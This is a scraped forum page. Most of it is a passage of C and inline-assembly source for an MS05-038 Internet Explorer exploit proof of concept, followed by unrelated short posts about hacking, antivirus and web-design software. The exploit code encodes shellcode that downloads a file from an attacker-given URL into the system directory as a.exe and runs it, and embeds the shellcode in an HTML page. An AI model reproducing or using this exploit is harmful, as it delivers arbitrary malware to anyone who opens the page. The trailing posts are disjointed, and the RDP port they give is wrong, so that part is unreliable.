NULL ) { fwrite(htmlbody1, strlen(htmlbody1), 1, stream); fwrite( tmp, strlen(tmp), 1, stream ); fwrite(htmlbody2, strlen(htmlbody2), 1, stream); fclose(stream); } else { printf("fopen wrong\n"); exit(0); } return 0;}void Make_ShellCode(char *url1){ unsigned char *pSc_addr; unsigned int Enc_key=ENC_KEY; unsigned long dwHash[100]; unsigned int dwHashSize; int i,j,k,l; // Get functions hash //printf("[+] Get functions hash strings.\r\n"); for (i=0;;i++) { if (functions[i][0] == '\x0') break; dwHash[i] = GetHash((char*)functions[i]); //printf("\t%.8X\t%s\n", dwHash[i], functions[i]); } dwHashSize = i*4; // Deal with shellcode pSc_addr = (unsigned char *)ShellCode; for (k=0;k<MAX_SC_LEN;++k ) { if(memcmp(pSc_addr+k,SEARCH_STR, SEARCH_LEN)==0) { break; } } pSc_addr+=(k+SEARCH_LEN); // Start of the ShellCode for (k=0;k<MAX_SC_LEN;++k) { if(memcmp(pSc_addr+k,SEARCH_STR, SEARCH_LEN)==0) { break; } } Sc_len=k; // Length of the ShellCode memcpy(sc, pSc_addr, Sc_len); // Copy shellcode to sc[] // Add functions hash memcpy(sc+Sc_len, (char *)dwHash, dwHashSize); Sc_len += dwHashSize; // Add url memcpy(sc+Sc_len, url1, strlen(url1)+1); Sc_len += strlen(url1)+1; // Deal with find the right XOR byte for(i=0xff; i>0; i--) { l = 0; for(j=DECODE_LEN; j<Sc_len; j++) { if ( ((sc[j] ^ i) == 0x26) || //% ((sc[j] ^ i) == 0x3d) || //= ((sc[j] ^ i) == 0x3f) || //? ((sc[j] ^ i) == 0x40) || //@ ((sc[j] ^ i) == 0x00) || ((sc[j] ^ i) == 0x0D) || ((sc[j] ^ i) == 0x0A) ) // Define Bad Characters { l++; // If found the right XOR byte,l equals 0 break; }; } if (l==0) { Enc_key = i; //printf("[+] Find XOR Byte: 0x%02X\n", i); for(j=DECODE_LEN; j<Sc_len; j++) { sc[j] ^= Enc_key; } break; // If found the right XOR byte, Break } } // Deal with not found XOR byte if (l!=0) { printf("[-] No xor byte found!\r\n"); exit(-1); } // Deal with DeCode string *(unsigned char *)&sc[SC_LEN_OFFSET] = Sc_len; *(unsigned char *)&sc[ENC_KEY_OFFSET] = Enc_key; printf("[+] download url:%s\n", url1);}int help(){ printf("Usage : ms05038.exe url [-t] \n"); printf(" the 't' option will let you test for the shellcode first\n"); exit(0);}void main(int argc, char **argv){ WSADATA wsa; unsigned char url[255]={0}; BOOL b_test; printf("\n========================================\n"); printf("Ms05-038 exploit POC\n"); printf("Write By Zwell\n"); printf("2005-8-11\n"); printf("http://http://www.donews.com/404.html;; printf("zwell@sohu.com\n"); printf("========================================\n\n"); b_test=FALSE; if(argc<2) help(); strncpy(url, argv[1], 255); if(argc == 3) if(!strcmp(argv[2], "-t")) b_test = TRUE; WSAStartup(MAKEWORD(2,2),&wsa); Make_ShellCode(url); printf("[+] Build shellcode successful\n"); buildfile(sc, Sc_len); printf("[+] Build file successful\n"); printf("Now, you can open the builded file(zwell_ms05038.html) with IE to see the result.Good Luck \n"); if(b_test) { printf("Testing the shellcode...\n"); ((void (*)(void)) &sc)(); } return;}// ShellCode functionvoid ShellCode(){ __asm { PROC_BEGIN // C macro to begin proc//--------------------------------------------------------------------//// DeCode////-------------------------------------------------------------------- jmp short decode_enddecode_start: pop ebx // Decode start addr (esp -> ebx) dec ebx xor ecx,ecx mov cl,0xFF // Decode len decode_loop: xor byte ptr [ebx+ecx],ENC_KEY // Decode key loop decode_loop jmp short decode_okdecode_end: call decode_startdecode_ok://--------------------------------------------------------------------//// ShellCode////-------------------------------------------------------------------- jmp sc_endsc_start: pop edi // Hash string start addr (esp -> edi) // Get kernel32.dll base addr mov eax, fs:0x30 // PEB mov eax, [eax+0x0c] // PROCESS_MODULE_INFO mov esi, [eax+0x1c] // InInitOrder.flink lodsd // eax = InInitOrder.blink mov ebp, [eax+8] // ebp = kernel32.dll base address mov esi, edi // Hash string start addr -> esi // Get function addr of kernel32 push 4 pop ecx getkernel32: call GetProcAddress_fun loop getkernel32 // Get function addr of urlmon push 0x00006e6f push 0x6d6c7275 // urlmon push esp call ADDR_LoadLibraryA // LoadLibraryA("urlmon"); mov ebp, eax // ebp = urlmon.dll base address/* push 1 pop ecx geturlmon: call GetProcAddress_fun loop geturlmon*/ call GetProcAddress_fun // url start addr = edi//LGetSystemDirectoryA: sub esp, 0x20 mov ebx, esp push 0x20 push ebx call ADDR_GetSystemDirectoryA // GetSystemDirectoryA//LURLDownloadToFileA: // eax = system path size // URLDownloadToFileA url save to a.exe mov dword ptr [ebx+eax], 0x652E615C // "\a.e" mov dword ptr [ebx+eax+0x4], 0x00006578 // "xe" xor eax, eax push eax push eax push ebx // %systemdir%\a.exe push edi // url push eax call ADDR_URLDownloadToFileA // URLDownloadToFileA//LWinExec: mov ebx, esp push eax push ebx call ADDR_WinExec // WinExec(%systemdir%\a.exe);Finished: //push 1 call ADDR_ExitProcess // ExitProcess();GetProcAddress_fun: push ecx push esi mov esi, [ebp+0x3C] // e_lfanew mov esi, [esi+ebp+0x78] // ExportDirectory RVA add esi, ebp // rva2va push esi mov esi, [esi+0x20] // AddressOfNames RVA add esi, ebp // rva2va xor ecx, ecx dec ecx find_start: inc ecx lodsd add eax, ebp xor ebx, ebx hash_loop: movsx edx, byte ptr [eax] cmp dl, dh jz short find_addr ror ebx, HASH_KEY // hash key add ebx, edx inc eax jmp short hash_loop find_addr: cmp ebx, [edi] // compare to hash jnz short find_start pop esi // ExportDirectory mov ebx, [esi+0x24] // AddressOfNameOrdinals RVA add ebx, ebp // rva2va mov cx, [ebx+ecx*2] // FunctionOrdinal mov ebx, [esi+0x1C] // AddressOfFunctions RVA add ebx, ebp // rva2va mov eax, [ebx+ecx*4] // FunctionAddress RVA add eax, ebp // rva2va stosd // function address save to [edi] pop esi pop ecx retsc_end: call sc_start PROC_END //C macro to end proc }}
-
You shoud learn C++ and Perl language (if you want agood hacker) and Network and know how compiling exploit and ...iranian boy
-
hi i`m iranian and i try to make a php chat in my site i try to use PHPMYCHAT but it need php 3 and mySQL and... so i go here and post therefore i take ana accontbabay
-
you can use remote desk top protocol )1433/tcp) to conect to other windows but it must on it and you must have a admin account.
-
but some body do not know the linux and only think windows is only OS!!!!iranisan boy
-
i hope for you.....iranisan boy
-
do you think that????or.....iranian boy
-
norton is good but symantec corporate 10 is the best!!!babayiranian boy
-
i think windows is user friendlyer than linux but if sb wants to use profefesional from computer he must use linux (debian or suse or ....)babayiranian boy
Softwares For Web Designing web designing
in Software
Posted · Report reply
i think if you want to build a site and you don`t know HTML (like me) you must use front page(xp or 2003),if you learned HTML alittle or very much you can use dreamwear,but if you learned HTML(php or asp...) well you can use notepad!!!so i use dreamwear beacause i know HTML a little , and it is good webdesign software!!exuse me because i can`t english better than it!!!!by